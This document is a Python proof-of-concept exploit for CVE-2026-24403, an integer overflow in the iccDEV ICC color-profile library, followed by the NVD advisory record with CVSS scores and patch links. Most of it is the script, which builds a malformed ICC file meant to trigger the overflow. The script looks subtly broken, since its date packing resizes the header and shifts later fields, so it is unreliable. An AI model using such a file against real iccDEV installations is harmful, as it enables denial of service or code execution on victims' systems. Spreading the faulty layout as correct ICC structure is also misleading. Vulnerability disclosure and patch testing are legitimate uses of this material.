CVE-2026-24403

#!/usr/bin/env python3 """ PoC for CVE-2026-24403: iccDEV Integer Overflow in CIccProfile::CheckHeader() This PoC demonstrates the integer overflow vulnerability by crafting a malicious ICC profile with manipulated tag table size fields. """ import struct import os def create_malicious_icc_profile(): """ Create a malicious ICC profile that triggers integer overflow in CIccProfile::CheckHeader() function. """ # ICC Profile Header (128 bytes) header = bytearray(128) # Profile size field - set to a value that will cause overflow # when combined with tag count in size calculations profile_size = 0xFFFFFFFF # Max uint32 - will overflow when calculating actual size struct.pack_into('>I', header, 0, profile_size) # Preferred CMM type header[4:8] = b'lcms' # Profile version (2.3.1.1) header[8:12] = struct.pack('>I', 0x02310100) # Device class header[12:16] = b'mntr' # Color space header[16:20] = b'RGB ' # PCS header[20:24] = b'Lab ' # Date header[24:36] = struct.pack('>IIIIII', 2026, 1, 1, 0, 0, 0) # Profile file signature header[36:40] = b'acsp' # Primary platform header[40:44] = b'MSFT' # Various flags struct.pack_into('>I', header, 44, 0) # Device manufacturer header[48:52] = b'TEST' # Device model header[52:56] = b'MODL' # Device attributes header[56:64] = b'\x00' * 8 # Rendering intent struct.pack_into('>I', header, 64, 0) # PCS illuminant (D50) struct.pack_into('>III', header, 68, 0x0000F6D6, 0x00010000, 0x0000F6D6) # Profile creator header[80:84] = b'TEST' # Profile ID (MD5) header[84:100] = b'\x00' * 16 # Tag count - set high to trigger overflow in size calculations tag_count = 0xFFFFFFF0 # Large value that will cause integer overflow struct.pack_into('>I', header, 128, tag_count) # Write malicious profile with open('CVE-2026-24403_malicious.icc', 'wb') as f: f.write(header) print(f"[+] Created malicious ICC profile: CVE-2026-24403_malicious.icc") print(f"[+] Profile size field: 0x{profile_size:08X}") print(f"[+] Tag count: {tag_count}") print(f"[+] This profile will trigger integer overflow in CIccProfile::CheckHeader()") if __name__ == '__main__': create_malicious_icc_profile()

{"cve": {"id": "CVE-2026-24403", "sourceIdentifier": "[email protected]", "published": "2026-01-24T01:15:50.620", "lastModified": "2026-01-30T18:23:11.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. In versions 2.3.1.1 and below, an integer overflow vulnerability exists in icValidateStatus CIccProfile::CheckHeader() when user-controllable input is incorporated into profile data unsafely. Tampering with tag tables, offsets, or size fields can trigger parsing errors, memory corruption, or DoS, potentially enabling arbitrary Code Execution or bypassing application logic. This issue has been fixed in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona librerías y herramientas para interactuar con, manipular y aplicar perfiles de gestión de color ICC. En las versiones 2.3.1.1 e inferiores, existe una vulnerabilidad de desbordamiento de entero en icValidateStatus CIccProfile::CheckHeader() cuando la entrada controlable por el usuario se incorpora de forma insegura en los datos del perfil. La manipulación de tablas de etiquetas, desplazamientos o campos de tamaño puede desencadenar errores de análisis, corrupción de memoria o DoS, lo que podría permitir la ejecución de código arbitrario o eludir la lógica de la aplicación. Este problema se ha solucionado en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commits/d993997005449a0a6958e65b057bd25e17dff89", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/505", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-ph33-qp8j-5q34", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}